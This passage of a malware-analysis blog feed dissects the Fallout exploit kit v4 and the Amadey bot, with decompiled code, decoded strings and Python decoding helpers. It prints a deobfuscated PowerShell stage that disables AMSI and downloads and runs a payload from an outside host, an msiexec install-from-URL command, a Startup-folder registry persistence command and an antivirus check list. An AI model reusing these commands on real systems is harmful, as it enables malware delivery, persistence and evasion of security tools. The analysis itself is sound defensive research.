</code></pre></div></div> <p>The shellcode is built by the following function.</p> <div class="language-vb highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Function GetShellcode()
' The multi-kilobyte %u-encoded shellcode string literal is omitted here.
IIlI=Unescape("%u0000%u0000%u0000%u0000") &amp;Unescape("..." &amp;lIIII(IIIII("")))
' Pad the buffer to &amp;h80000 bytes with 0x4141 (each %u4141 is two bytes).
IIlI=IIlI &amp; String((&amp;h80000-LenB(IIlI))/2,Unescape("%u4141"))
GetShellcode=IIlI
End Function
</code></pre></div></div> <p>Let’s read the shellcode.</p> <h2 id="shellcode">Shellcode</h2> <p>The decoding algorithm in the shellcode has not changed from v3 and remains RC4 (see <a href="https://nao-sec.org/2019/03/analysis-of-fallout-exploit-kit-v3.html">Analysis of Fallout Exploit Kit v3</a>).</p> <p>The API hashing algorithm has not changed either: APIs are resolved by the hash computed by dualaccModFFF1Hash.</p> <div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>unsigned int __thiscall dualaccModFFF1Hash(unsigned __int8 *this)
{
  unsigned __int8 *v1; // ebx
  int v2; // edi
  unsigned int v3; // esi
  int i; // ecx
  unsigned int v5; // edx

  v1 = this;
  v2 = 1;
  v3 = 0;
  for ( i = zz_count(this); i; --i )
  {
    v5 = (v2 + (unsigned int)*v1++) % 0xFFF1;
    v2 = v5;
    v3 = (v3 + v5) % 0xFFF1;
  }
  return v2 + (v3 &lt;&lt; 16);
}
</code></pre></div></div> <p>However, there are interesting changes: analysis-environment detection code has been added to the shellcode.</p> <h3 id="vm-detection">VM Detection</h3> <p>The shellcode queries hypervisor presence using CPUID: it requests leaf 1 and returns bit 31 of ECX.</p> <div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>unsigned int __thiscall zz_vm_detect(unsigned int *this)
{
  unsigned int *v1; // edi
  unsigned int result; // eax

  v1 = this;
  _EAX = 1;
  __asm { cpuid }
  result = _ECX &gt;&gt; 31;
  *v1 = _ECX &gt;&gt; 31;
  return result;
}
</code></pre></div></div> <h3 id="process-detection">Process Detection</h3> <p>It enumerates the running processes.</p> <p><img src="https://nao-sec.org/assets/2019-07-09/03.jpg" alt="" /></p> <p>Each process name is converted to lower case.</p> <div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int __cdecl zz_tolowercase(_BYTE *a1)
{
  int result; // eax

  while ( 1 )
  {
    result = (char)*a1;
    if ( !*a1 )
      break;
    if ( (char)*a1 &gt;= 65 &amp;&amp; (char)*a1 &lt;= 90 )
      *a1 += 32;
    ++a1;
  }
  return result;
}
</code></pre></div></div> <p>The lower-cased name is hashed and compared against the following hashes. Once again, it uses the dualaccModFFF1Hash algorithm.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0x3F5406DE
0x25CD0541
0x0F050309
0x161803EC
0x19F3044B
</code></pre></div></div> <p><img src="https://nao-sec.org/assets/2019-07-09/04.jpg" alt="" /></p> <p>Two process names were identified. I do not know the others.</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code>&gt;&gt;&gt; hex(dualaccModFFF1Hash("wireshark.exe"))
'0x25cd0541'
&gt;&gt;&gt; hex(dualaccModFFF1Hash("fiddler.exe"))
'0x19f3044b'
</code></pre></div></div> <p>Like v3, the shellcode downloads, decodes and executes encrypted PowerShell code.</p> <h2 id="powershell">PowerShell</h2> <p>The PowerShell command that is executed looks like this.</p> <div class="language-powershell highlighter-rouge"><div class="highlight"><pre class="highlight"><code>powershell.exe -w hidden -noni -enc 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=
</code></pre></div></div> <p>Let’s decode and clean it up.</p> <div class="language-powershell highlighter-rouge"><div class="highlight"><pre class="highlight"><code>try {
  $l1Il1 = [Ref].Assembly;
  $l1Il1lI1IIl = $l1Il1.GetType("System.Management.Automation.AmsiUtils");
  $I1Il11l1Il = $l1Il1lI1IIl.GetField("amsiInitFailed", 'NonPublic,Static');
  $I1Il11l1Il.SetValue($null, $true);
} catch { };
Add-Type -TypeDefinition "using System;using System.Diagnostics;using System.Runtime.InteropServices;[StructLayout(LayoutKind.Sequential)]public struct I1lII1Il1{public IntPtr IIlI1;public IntPtr lIl1I1II1l;public uint IIIIIlII;public uint Il111lIl1I1I;}[StructLayout(LayoutKind.Sequential,CharSet=CharSet.Unicode)]public struct lI1ll1Il1I1l{public uint IIIlI;public string Il1l1;public string lI1ll;public string Il111IIIl;public uint I1lIl1ll1I;public uint IlIIIl1;public uint ll11Ill;public uint Il1IlIl1;public uint lIlIII;public uint lI1lIlI;public uint lI1l11;public uint Ill1Il;public short IlII1;public short IllIll;public IntPtr llIlIlIlI;public IntPtr Ill1IlIlI;public IntPtr IllIlllI1I1;public IntPtr I1III;};public static class l1Il11III{[DllImport(""kernel32.dll"",SetLastError=true)]public static extern bool CreateProcess(string IIlIII,string IlIlI,IntPtr I11l1I,IntPtr l1lI1,bool IlI11II1111,uint l111I,IntPtr lIII1IllI,string I1Il1lI,ref lI1ll1Il1I1l ll11IIl1I,out I1lII1Il1 lII1II);}";
$lll1IllI1 = "$env:userprofile\AppData\LocalLow\$(-join((48..57)+(65..90)+(97..122)|Get-Random -Count 8|%{[char]$_})).tmp";
$I1l11I1 = 'http://beahero4u.com/1950-01-11/O8Zr';
$cli = (New-Object Net.WebClient);
$cli.Headers['User-Agent'] = 'J57P9y1i30M102X5';
$cli.DownloadFile($I1l11I1, $lll1IllI1);
$I1I1l1IIllI1 = New-Object lI1ll1Il1I1l;
$I1I1l1IIllI1.IlII1 = 0x0;
$I1I1l1IIllI1.IIIlI = [System.Runtime.InteropServices.Marshal]::SizeOf($I1I1l1IIllI1);
$IIl1Il1I = New-Object I1lII1Il1;
[l1Il11III]::CreateProcess($lll1IllI1, $lll1IllI1, [IntPtr]::Zero, [IntPtr]::Zero, $false, 0x00000008, [IntPtr]::Zero, "c:", [ref]$I1I1l1IIllI1, [ref]$IIl1Il1I) | out-null;
</code></pre></div></div> <p>In this way the malware is downloaded and executed.</p> <h2 id="conclusion">Conclusion</h2> <p>Fallout has been heavily updated, which makes analysis considerably harder. Sophisticated techniques such as Diffie-Hellman key exchange, VM detection and process detection are used. We need to stay alert, as it may be updated again in the future.</p>
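<p>Returning to the shellcode's process-detection hashes above: the decompiled dualaccModFFF1Hash routine is an Adler-32 checksum (two accumulators reduced mod 0xFFF1, the first seeded with 1), so its values can be reproduced with zlib.adler32. The script below is an added example, not code from the nao_sec write-up: it ports the routine, checks it against zlib, and resolves the five hashes from the shellcode against a constructed candidate list of lower-cased tool names (the candidate names are hypothetical; only the two the post identifies are expected to match).</p>

```python
import zlib

# The five process-name hashes embedded in the Fallout v4 shellcode (copied from the post).
SHELLCODE_PROCESS_HASHES = [0x3F5406DE, 0x25CD0541, 0x0F050309, 0x161803EC, 0x19F3044B]

# Constructed candidate list: hypothetical names, not from the post. Mixed case on
# purpose, to show that the name must be lower-cased exactly as the shellcode does.
CANDIDATES = ["Wireshark.exe", "Fiddler.exe", "procmon.exe", "ollydbg.exe", "idaq.exe"]


def dualacc_mod_fff1_hash(data: bytes) -> int:
    """Port of the decompiled dualaccModFFF1Hash.

    v2 (seeded with 1) accumulates the bytes mod 0xFFF1, v3 accumulates the running
    value of v2 mod 0xFFF1; the result is v2 in the low word and v3 in the high word.
    """
    v2, v3 = 1, 0
    for byte in data:
        v2 = (v2 + byte) % 0xFFF1
        v3 = (v3 + v2) % 0xFFF1
    return v2 | (v3 << 16)


def zz_tolowercase(name: str) -> bytes:
    """Mirror the shellcode's zz_tolowercase: only ASCII 'A'..'Z' (65..90) get +32."""
    return bytes(c + 32 if 65 <= c <= 90 else c for c in name.encode("ascii"))


def is_adler32(data: bytes) -> bool:
    """True when the ported routine agrees with zlib's Adler-32 for this input."""
    return dualacc_mod_fff1_hash(data) == zlib.adler32(data)


def resolve_process_hashes(hashes, candidates):
    """Map each shellcode hash to a candidate process name.

    Every candidate is hashed the way the shellcode hashes a running process
    (lower-cased first). Returns (resolved: {hash: name}, unresolved: [hash]).
    """
    table = {}
    for name in candidates:
        lowered = zz_tolowercase(name)
        table[dualacc_mod_fff1_hash(lowered)] = lowered.decode("ascii")
    resolved = {h: table[h] for h in hashes if h in table}
    unresolved = [h for h in hashes if h not in table]
    return resolved, unresolved


if __name__ == "__main__":
    resolved, unresolved = resolve_process_hashes(SHELLCODE_PROCESS_HASHES, CANDIDATES)
    for h, name in resolved.items():
        print(f"{h:#010x} -> {name}")
    for h in unresolved:
        print(f"{h:#010x} -> (no candidate matched)")
```

Any other tool list can be fed to resolve_process_hashes; a hash only matches when the lower-cased name is byte-for-byte what the shellcode would read from the process list.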
  63. Analyzing Amadey

    Sat, 27 Apr 2019 15:00:00 -0000

<h2 id="initial-access">Initial Access</h2>
<p>Amadey is installed by msiexec.exe when the victim opens a malicious Excel file. Judging from the technique used in the document file, the threat actor is believed to be TA505.</p>
<ul>
<li><a href="https://ti.360.net/blog/articles/excel-4.0-macro-utilized-by-ta505-to-target-financial-institutions-recently-en/">Excel 4.0 Macro Utilized by TA505 to Target Financial Institutions Recently</a></li>
<li><a href="https://www.cybereason.com/blog/threat-actor-ta505-targets-financial-enterprises-using-lolbins-and-a-new-backdoor-malware">Threat Actor TA505 Targets Financial Enterprises Using LOLBins and a New Backdoor Malware</a></li>
</ul>
<p><img src="https://nao-sec.org/assets/2019-04-28/01.jpg" width="100%" /> https://app.any.run/tasks/3430e711-7bb1-49b4-ac07-86b1a6b5c784</p>
<p>The download command line is as follows:</p>
<pre><code>msiexec.exe STOP=1 /i http://109.234.38.177/dom4 /q ksw='%TEMP%'
</code></pre>
<h2 id="first-payload">First payload</h2>
<p>The first payload is packed. We extract the original PE using the hollows_hunter mode of tknk_scanner.</p>
<p><img src="https://nao-sec.org/assets/2019-04-28/02.jpg" width="100%" /></p>
<h2 id="amadey">Amadey</h2>
<p>The dumped PE is compiled with MinGW.</p>
<pre><code>PE: compiler: MinGW(-)[-]
PE: linker: GNU linker ld (GNU Binutils)(2.56*)[EXE32]
</code></pre>
<p>It still contains symbol information. Amadey has the following functions:</p>
<pre><code>_Z10aBypassUACv
_Z10aCharToIntPc
_Z10aGetOsArchv
_Z10aIntToChari
_Z11aAutoRunSetPc
_Z11aCheckAdminv
_Z11aCreateFilePc
_Z11aFileExistsPKc
_Z11aGetTempDirv
_Z11aProcessDllPcS_
_Z11aProcessExePcS_S_S_
_Z11aRunAsAdminPc
_Z12aGetHostNamev
_Z12aGetSelfPathv
_Z12aGetUserNamev
_Z12aProcessTaskPc
_Z12aResolveHostPc
_Z12aWinSockPostPcS_S_
_Z13aDropToSystemPc
_Z13aGetProcessILv
_Z14aCreateProcessPc
_Z14aGetProgramDirv
_Z15aUrlMonDownloadPcS_
_Z16aDirectoryExistsPc
_Z16aExtractFileNamePc
_Z16aGetHomeDriveDirv
_Z16aProcessDllLocalPcS_S_S_
_Z16aProcessExeLocalPcS_S_S_
_Z19aGetSelfDestinationi
_Z5aCopyPcii
_Z5aParsPcS_
_Z6aBasici
_Z6aGetIdv
_Z6aGetOsv
_Z6aMkDirPc
_Z7aPathAVPc
_Z7aRaportPcS_
_Z8aCheckAVv
_Z8aDecryptPc
_Z8aPosLastPcS_
_Z9aCopyFilePcS_
_Z9aFileSizePc
_Z9aFillCharPc
_Z9aFreeFilePc
_Z9aPosFirstPcS_
_Z9aRunDll32PcS_
</code></pre>
<p>The main function (decompiler output) is as follows.</p>
<pre><code class="language-c">int __cdecl main(int _Argc,char **_Argv,char **_Env)
{
  char *pcVar1;

  /* 0x3ac8  97  main */
  FUN_00404020();
  FUN_00403cc0();
  _Z10aBypassUACv();
  /* copy itself into the drop directory (DropDir / DropName, decoded below) */
  pcVar1 = _Z12aGetSelfPathv();
  _Z13aDropToSystemPc(pcVar1);
  /* point the Startup shell folder at the drop location (AutoRunCmd, decoded below) */
  pcVar1 = _Z19aGetSelfDestinationi(0);
  _Z11aAutoRunSetPc(pcVar1);
  /* 0 = enter the beacon loop */
  _Z6aBasici(0);
  return 0;
}
</code></pre>
<p>The _Z6aBasici function is as follows.</p>
<pre><code class="language-c">/* WARNING: Globals starting with '_' overlap smaller symbols at the same address */

void __cdecl _Z6aBasici(int param_1)
{
  char *_Source;
  uint uVar1;
  int iVar2;

  /* 0x33fe  32  _Z6aBasici */
  FUN_00404020();
  /* three buffers: request body, C2 domain, script path */
  _Z9aFillCharPc(&amp;stack0xffffeff4);
  _Z9aFillCharPc(&amp;stack0xffffddf4);
  _Z9aFillCharPc(&amp;stack0xffffdbf4);
  _Source = _Z8aDecryptPc(&amp;aDomain);
  strcat(&amp;stack0xffffddf4,_Source);
  _Source = _Z8aDecryptPc(&amp;aScript);
  strcat(&amp;stack0xffffdbf4,_Source);
  /* request body: id, vs, ar, bi, lv, os, av, pc, un (see the decoded ParamN strings below) */
  _Source = _Z8aDecryptPc(&amp;aParam0);
  strcat(&amp;stack0xffffeff4,_Source);
  _Source = _Z6aGetIdv();
  strcat(&amp;stack0xffffeff4,_Source);
  _Source = _Z8aDecryptPc(&amp;aParam1);
  strcat(&amp;stack0xffffeff4,_Source);
  _Source = _Z8aDecryptPc(&amp;aVers);
  strcat(&amp;stack0xffffeff4,_Source);
  uVar1 = _Z11aCheckAdminv();
  if ((uVar1 &amp; 0xff) == 1) {
    _Source = _Z8aDecryptPc(&amp;aParam2);
    strcat(&amp;stack0xffffeff4,_Source);
    strcat(&amp;stack0xffffeff4,"1");
  }
  else {
    _Source = _Z8aDecryptPc(&amp;aParam2);
    strcat(&amp;stack0xffffeff4,_Source);
    strcat(&amp;stack0xffffeff4,"0");
  }
  _Source = _Z8aDecryptPc(&amp;aParam3);
  strcat(&amp;stack0xffffeff4,_Source);
  _Source = _Z10aGetOsArchv();
  strcat(&amp;stack0xffffeff4,_Source);
  _Source = _Z8aDecryptPc(&amp;aParam4);
  strcat(&amp;stack0xffffeff4,_Source);
  _Source = _Z10aIntToChari(param_1);
  strcat(&amp;stack0xffffeff4,_Source);
  _Source = _Z8aDecryptPc(&amp;aParam5);
  strcat(&amp;stack0xffffeff4,_Source);
  iVar2 = _Z6aGetOsv();
  _Source = _Z10aIntToChari(iVar2);
  strcat(&amp;stack0xffffeff4,_Source);
  _Source = _Z8aDecryptPc(&amp;aParam6);
  strcat(&amp;stack0xffffeff4,_Source);
  uVar1 = _Z8aCheckAVv();
  _Source = _Z10aIntToChari(uVar1);
  strcat(&amp;stack0xffffeff4,_Source);
  _Source = _Z8aDecryptPc(&amp;aParam7);
  strcat(&amp;stack0xffffeff4,_Source);
  _Source = _Z12aGetHostNamev();
  strcat(&amp;stack0xffffeff4,_Source);
  _Source = _Z8aDecryptPc(&amp;aParam8);
  strcat(&amp;stack0xffffeff4,_Source);
  _Source = _Z12aGetUserNamev();
  strcat(&amp;stack0xffffeff4,_Source);
  strcat(&amp;stack0xffffeff4,"&amp;");
  if (param_1 == 0) {
    /* beacon loop: POST the body, parse the response on '#', sleep, repeat */
    do {
      _Z9aFillCharPc(&amp;stack0xffffdff4);
      _Source = _Z12aWinSockPostPcS_S_(&amp;stack0xffffddf4,&amp;stack0xffffdbf4,&amp;stack0xffffeff4);
      strcat(&amp;stack0xffffdff4,_Source);
      _Z5aParsPcS_(&amp;stack0xffffdff4,"#");
      Sleep(_aTimeOut);
    } while( true );
  }
  if (param_1 == 1) {
    /* one-shot report */
    _Z12aWinSockPostPcS_S_(&amp;stack0xffffddf4,&amp;stack0xffffdbf4,&amp;stack0xffffeff4);
  }
  return;
}
</code></pre>
<p>Some important parameters are encoded. However, the encoding algorithm is very simple: each encoded byte minus the key character at the same position (the key repeats) gives the plaintext byte.</p>
<p><img src="https://nao-sec.org/assets/2019-04-28/03.jpg" width="80%" /></p>
<p>The key is <code>8ebd3994693b0d4976021758c2d7bff793b0d4976021758c2d7bff7</code></p>
<p><img src="https://nao-sec.org/assets/2019-04-28/04.jpg" width="100%" /></p>
<p>Finally, we list each decoded string together with the function that uses it.</p>
<ul>
<li><code>_Z11aAutoRunSetPc</code>
<ul>
<li>AutoRunCmd : <code>REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d </code></li>
</ul>
</li>
<li><code>_Z8aCheckAVv</code>
<ul>
<li>AV00 : AVAST Software</li>
<li>AV01 : Avira</li>
<li>AV02 : Kaspersky Lab</li>
<li>AV03 : ESET</li>
<li>AV04 : Panda Security</li>
<li>AV05 : Doctor Web</li>
<li>AV06 : AVG</li>
<li>AV07 : 360TotalSecurity</li>
<li>AV08 : Bitdefender</li>
<li>AV09 : Norton</li>
<li>AV10 : Sophos</li>
<li>AV11 : Comodo</li>
</ul>
</li>
<li><code>_Z12aWinSockPostPcS_S_</code>
<ul>
<li>CMD0 : <code>&lt;c&gt;</code></li>
<li>CMD1 : <code>&lt;d&gt;</code></li>
</ul>
</li>
<li><code>_Z11aProcessDllPcS_</code>
<ul>
<li>dll : dll</li>
</ul>
</li>
<li><code>_Z7aRaportPcS_, _Z6aBasici</code>
<ul>
<li>domain : gohaiendo[.]com</li>
</ul>
</li>
<li><code>_Z19aGetSelfDestinationi</code>
<ul>
<li>DropDir : f64a428dfd</li>
<li>DropName : cmualrc.exe</li>
</ul>
</li>
<li><code>_Z11aProcessExePcS_S_S_</code>
<ul>
<li>exe : exe</li>
</ul>
</li>
<li><code>_Z14aGetProgramDirv</code>
<ul>
<li>GetProgDir : ProgramData\</li>
</ul>
</li>
<li><code>_Z10aGetOsArchv, _Z6aGetOsv</code>
<ul>
<li>OS_AR0 : kernel32.dll</li>
<li>OS_AR1 : GetNativeSystemInfo</li>
</ul>
</li>
<li><code>_Z6aBasici</code>
<ul>
<li>Param0 : id=</li>
<li>Param1 : &amp;vs=</li>
<li>Param2 : &amp;ar=</li>
<li>Param3 : &amp;bi=</li>
<li>Param4 : &amp;lv=</li>
<li>Param5 : &amp;os=</li>
<li>Param6 : &amp;av=</li>
<li>Param7 : &amp;pc=</li>
<li>Param8 : &amp;un=</li>
<li>Vers : 1.22</li>
<li>ZoneIdent : <code>:Zone.Identifier</code></li>
</ul>
</li>
<li><code>_Z12aWinSockPostPcS_S_</code>
<ul>
<li>Post0 : 1310</li>
<li>Post1 : HTTP/1.1</li>
<li>Post2 : Accept: */*</li>
<li>Post3 : Content-Type: application/x-www-form-urlencoded</li>
<li>Post4 : Host:</li>
<li>Post5 : Content-Length:</li>
<li>Post6 : POST /</li>
</ul>
</li>
<li><code>_Z11aRunAsAdminPc</code>
<ul>
<li>RunAs : runas</li>
</ul>
</li>
<li><code>_Z9aRunDll32PcS_</code>
<ul>
<li>RunDll_0 : rundll32.exe</li>
</ul>
</li>
<li><code>_Z7aRaportPcS_, _Z6aBasici</code>
<ul>
<li>Script : ppk/index.php</li>
</ul>
</li>
<li><code>_Z11aCheckAdminv</code>
<ul>
<li>Shell : SHELL32.DLL</li>
</ul>
</li>
<li><code>_Z14aCreateProcessPc, _Z6aBasici</code>
<ul>
<li>TimeOut : 40133-98-10017</li>
</ul>
</li>
<li><code>_Z15aUrlMonDownloadPcS_</code>
<ul>
<li>URLMon_0 : urlmon</li>
<li>URLMon_1 : URLDownloadToFileA</li>
</ul>
</li>
</ul>
<p>Here is a simple Python decoding script. The docstring keeps every encoded array dumped from the sample; copy one of them into <code>encoded_str</code> to decode it.</p>
<pre><code class="language-py">'''
domain=[0x9F, 0xD4, 0xCA, 0xC5, 0x9C, 0x9E, 0xA7, 0x98, 0xA5, 0x67, 0x96, 0xD1, 0x9D]
AutoRunCmdr=[0x8A, 0xAA, 0xA9, 0x84, 0x74, 0x7D, 0x7D, 0x54, 0x58, 0x81, 0x7E, 0xA5, 0x85, 0xC0, 0x87, 0xA8, 0x9D, 0xAA, 0xA7, 0x93, 0xA3, 0x9C, 0x91, 0x85, 0xCC, 0x95, 0xD6, 0xA6, 0xD5, 0xD5, 0xCC, 0xAB, 0x95, 0x8A, 0xCB, 0x9E, 0xC8, 0xA3, 0xB0, 0xAA, 0x92, 0x73, 0xA7, 0xA3, 0xA9, 0x9A, 0xA6, 0xD7, 0x88, 0xC9, 0xA9, 0xD5, 0xCF, 0xD5, 0xA5, 0x94, 0xAA, 0xDA, 0xD4, 0x9F, 0xA8, 0xAB, 0x99, 0xA8, 0x95, 0x88, 0xD5, 0x95, 0xD6, 0x54, 0x8C, 0x9F, 0x9B, 0x9C, 0x9E, 0x51, 0x7D, 0xA4, 0xA4, 0xC7, 0x97, 0xD6, 0xAA, 0x84, 0x86, 0x95, 0x9D, 0x59, 0x62, 0xD8, 0x50, 0xB7, 0xA8, 0x9A, 0xA9, 0xAA, 0xA5, 0xA2, 0x51, 0x66, 0xA9, 0x58, 0xB5, 0x77, 0xAB, 0x96, 0xB5, 0xC0, 0x86, 0x66, 0x9C, 0x85]
AV00=[0x79, 0xBB, 0xA3, 0xB7, 0x87, 0x59, 0x8C, 0xA3, 0x9C, 0xAD, 0xAA, 0xC3, 0xA2, 0xC9]#AV00
AV01=[0x79, 0xDB, 0xCB, 0xD6, 0x94]
AV02=[0x83, 0xC6, 0xD5, 0xD4, 0x98, 0xAB, 0xAC, 0x9F, 0xAF, 0x59, 0x7F, 0xC3, 0x92]
AV03=[0x7D, 0xB8, 0xA7, 0xB8]
AV04=[0x88, 0xC6, 0xD0, 0xC8, 0x94, 0x59, 0x8C, 0x99, 0x99, 0xAE, 0xA5, 0xCB, 0xA4, 0xDD]
AV05=[0x7C, 0xD4, 0xC5, 0xD8, 0xA2, 0xAB, 0x59, 0x8B, 0x9B, 0x9B]
AV06=[0x79, 0xBB, 0xA9]
AV07=[0x6B, 0x9B, 0x92, 0xB8, 0xA2, 0xAD, 0x9A, 0xA0, 0x89, 0x9E, 0x96, 0xD7, 0xA2, 0xCD, 0xA8, 0xB2]
AV08=[0x7A, 0xCE, 0xD6, 0xC8, 0x98, 0x9F, 0x9E, 0xA2, 0x9A, 0x9E, 0xA5]
AV09=[0x86, 0xD4, 0xD4, 0xD8, 0xA2, 0xA7]
AV10=[0x8B, 0xD4, 0xD2, 0xCC, 0xA2, 0xAC]
AV11=[0x7B, 0xD4, 0xCF, 0xD3, 0x97, 0xA8]
CMD0=[0x74, 0xC8, 0xA0]
CMD1=[0x74, 0xC9, 0xA0]
DLL=[0x9C, 0xD1, 0xCE]
DropDir=[0x9E, 0x9B, 0x96, 0xC5, 0x67, 0x6B, 0x71, 0x98, 0x9C, 0x9D]
DropName=[0x9B, 0xD2, 0xD7, 0xC5, 0x9F, 0xAB, 0x9C, 0x62, 0x9B, 0xB1, 0x98]
exe=[0x9D, 0xDD, 0xC7]
GetProgDir=[0x88, 0xD7, 0xD1, 0xCB, 0xA5, 0x9A, 0xA6, 0x78, 0x97, 0xAD, 0x94, 0xBE]
OS_AR0=[0xA3, 0xCA, 0xD4, 0xD2, 0x98, 0xA5, 0x6C, 0x66, 0x64, 0x9D, 0x9F, 0xCE]
OS_AR1=[0x7F, 0xCA, 0xD6, 0xB2, 0x94, 0xAD, 0xA2, 0xAA, 0x9B, 0x8C, 0xAC, 0xD5, 0xA4, 0xC9, 0xA1, 0x82, 0xA5, 0x9C, 0x9F]
Param0=[0xA1, 0xC9, 0x9F]
Param1=[0x5E, 0xDB, 0xD5, 0xA1]
Param2=[0x5E, 0xC6, 0xD4, 0xA1]
Param3=[0x5E, 0xC7, 0xCB, 0xA1]
Param4=[0x5E, 0xD1, 0xD8, 0xA1]
Param5=[0x5E, 0xD4, 0xD5, 0xA1]
Param6=[0x5E, 0xC6, 0xD8, 0xA1]
Param7=[0x5E, 0xD5, 0xC5, 0xA1]
Param8=[0x5E, 0xDA, 0xD0, 0xA1]
Post0=[0x45, 0x6F]
Post1=[0x58, 0xAD, 0xB6, 0xB8, 0x83, 0x68, 0x6A, 0x62, 0x67]
Post2=[0x79, 0xC8, 0xC5, 0xC9, 0xA3, 0xAD, 0x73, 0x54, 0x60, 0x68, 0x5D]
Post3=[0x7B, 0xD4, 0xD0, 0xD8, 0x98, 0xA7, 0xAD, 0x61, 0x8A, 0xB2, 0xA3, 0xC7, 0x6A, 0x84, 0x95, 0xA9, 0xA7, 0xA2, 0x99, 0x95, 0x92, 0xAB, 0x9E, 0xA7, 0xD1, 0x61, 0xDC, 0x64, 0xD9, 0xDD, 0xDD, 0x64, 0x9F, 0xA2, 0xD4, 0x9D, 0x91, 0xA9, 0xAB, 0xA3, 0x9B, 0x9E, 0x95, 0xA0, 0x9B, 0x9A, 0x9C]
Post4=[0x80, 0xD4, 0xD5, 0xD8, 0x6D, 0x59]
Post5=[0x7B, 0xD4, 0xD0, 0xD8, 0x98, 0xA7, 0xAD, 0x61, 0x82, 0x9E, 0xA1, 0xC9, 0xA4, 0xCC, 0x6E, 0x59]
Post6=[0x88, 0xB4, 0xB5, 0xB8, 0x53, 0x68]
RunAs=[0xAA, 0xDA, 0xD0, 0xC5, 0xA6]
RunDll_0=[0xAA, 0xDA, 0xD0, 0xC8, 0x9F, 0xA5, 0x6C, 0x66, 0x64, 0x9E, 0xAB, 0xC7, 0x50]
Script=[0xA8, 0xD5, 0xCD, 0x93, 0x9C, 0xA7, 0x9D, 0x99, 0xAE, 0x67, 0xA3, 0xCA, 0xA0]
Shell=[0x8B, 0xAD, 0xA7, 0xB0, 0x7F, 0x6C, 0x6B, 0x62, 0x7A, 0x85, 0x7F]
TimeOut=[0x60, 0xEA, 0x00, 0x00, 0x44]
URLMon_0=[0xAD, 0xD7, 0xCE, 0xD1, 0xA2, 0xA7]
URLMon_1=[0x8D, 0xB7, 0xAE, 0xA8, 0xA2, 0xB0, 0xA7, 0xA0, 0xA5, 0x9A, 0x97, 0xB6, 0x9F, 0xAA, 0x9D, 0xA5, 0x9C, 0x77]
Vers=[0x69, 0x93, 0x94, 0x96]
ZoneIdent =[0x72, 0xBF, 0xD1, 0xD2, 0x98, 0x67, 0x82, 0x98, 0x9B, 0xA7, 0xA7, 0xCB, 0x96, 0xCD, 0x99, 0xAB]
'''

# the array to decode (here: domain) and the key recovered from the sample
encoded_str = [0x9F, 0xD4, 0xCA, 0xC5, 0x9C, 0x9E, 0xA7, 0x98, 0xA5, 0x67, 0x96, 0xD1, 0x9D]
Key = "8ebd3994693b0d4976021758c2d7bff793b0d4976021758c2d7bff7"

# each plaintext byte is the encoded byte minus the key character at the
# same position; the key wraps around for strings longer than the key
for c in range(len(encoded_str)):
    print(chr(encoded_str[c] - ord(Key[c % len(Key)])), end='')
    #print(encoded_str[c] - ord(Key[c % len(Key)]), end='')
print()
</code></pre>
<h1 id="references">References</h1>
<ul>
<li>https://krabsonsecurity.com/2019/02/13/analyzing-amadey-a-simple-native-malware/</li>
</ul>
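Added example (not code from the nao_sec post) that applies the same key-subtraction rule to the other arrays the post lists, rebuilds the request body that _Z6aBasici concatenates, and flags a captured body by that fixed key order; it also shows why TimeOut prints as 40133-98-10017 and Post0 as 1310 (the raw differences 40, 133, -98, -100, 17 and 13, 10 run together) and reads TimeOut's first four bytes as a little-endian DWORD, which is this example's own interpretation that fits Sleep(_aTimeOut). The bot id, host, user and numeric codes fed to build_beacon_body are constructed sample values.

```python
"""Decode Amadey's key-subtraction strings and rebuild its beacon body."""
import struct
from typing import Dict, List, Optional

# Key recovered in the post; it repeats when a string is longer than the key.
KEY = "8ebd3994693b0d4976021758c2d7bff793b0d4976021758c2d7bff7"

# Subset of the encoded arrays from the post's script (same names, same bytes).
ENCODED: Dict[str, List[int]] = {
    "domain": [0x9F, 0xD4, 0xCA, 0xC5, 0x9C, 0x9E, 0xA7, 0x98, 0xA5, 0x67, 0x96, 0xD1, 0x9D],
    "Script": [0xA8, 0xD5, 0xCD, 0x93, 0x9C, 0xA7, 0x9D, 0x99, 0xAE, 0x67, 0xA3, 0xCA, 0xA0],
    "Vers": [0x69, 0x93, 0x94, 0x96],
    "Param0": [0xA1, 0xC9, 0x9F],
    "Param1": [0x5E, 0xDB, 0xD5, 0xA1],
    "Param2": [0x5E, 0xC6, 0xD4, 0xA1],
    "Param3": [0x5E, 0xC7, 0xCB, 0xA1],
    "Param4": [0x5E, 0xD1, 0xD8, 0xA1],
    "Param5": [0x5E, 0xD4, 0xD5, 0xA1],
    "Param6": [0x5E, 0xC6, 0xD8, 0xA1],
    "Param7": [0x5E, 0xD5, 0xC5, 0xA1],
    "Param8": [0x5E, 0xDA, 0xD0, 0xA1],
    "Post0": [0x45, 0x6F],
    "Post1": [0x58, 0xAD, 0xB6, 0xB8, 0x83, 0x68, 0x6A, 0x62, 0x67],
    "Post6": [0x88, 0xB4, 0xB5, 0xB8, 0x53, 0x68],
    "TimeOut": [0x60, 0xEA, 0x00, 0x00, 0x44],
}

# Key order of the POST body exactly as _Z6aBasici appends Param0..Param8.
AMADEY_KEYS = ["id", "vs", "ar", "bi", "lv", "os", "av", "pc", "un"]


def decode_values(encoded: List[int], key: str = KEY) -> List[int]:
    """Raw decode: encoded byte minus the key character at the same position.
    Results may be negative or non-printable, so chr() is not applied here."""
    return [b - ord(key[i % len(key)]) for i, b in enumerate(encoded)]


def decode_string(encoded: List[int], key: str = KEY) -> Optional[str]:
    """Decoded text, or None when any value is outside printable ASCII.
    Post0 decodes to [13, 10] (CR LF) and TimeOut to a binary value, so
    both come back as None instead of garbage characters."""
    values = decode_values(encoded, key)
    if all(0x20 <= v < 0x7F for v in values):
        return "".join(chr(v) for v in values)
    return None


def decode_all(table: Dict[str, List[int]] = ENCODED) -> Dict[str, Optional[str]]:
    """Decode every named array; non-strings come back as None."""
    return {name: decode_string(data) for name, data in table.items()}


def timeout_ms(encoded: List[int] = ENCODED["TimeOut"]) -> int:
    """Our interpretation (not stated in the post): _aTimeOut is handed to
    Sleep(), so its first four bytes are a little-endian DWORD of milliseconds."""
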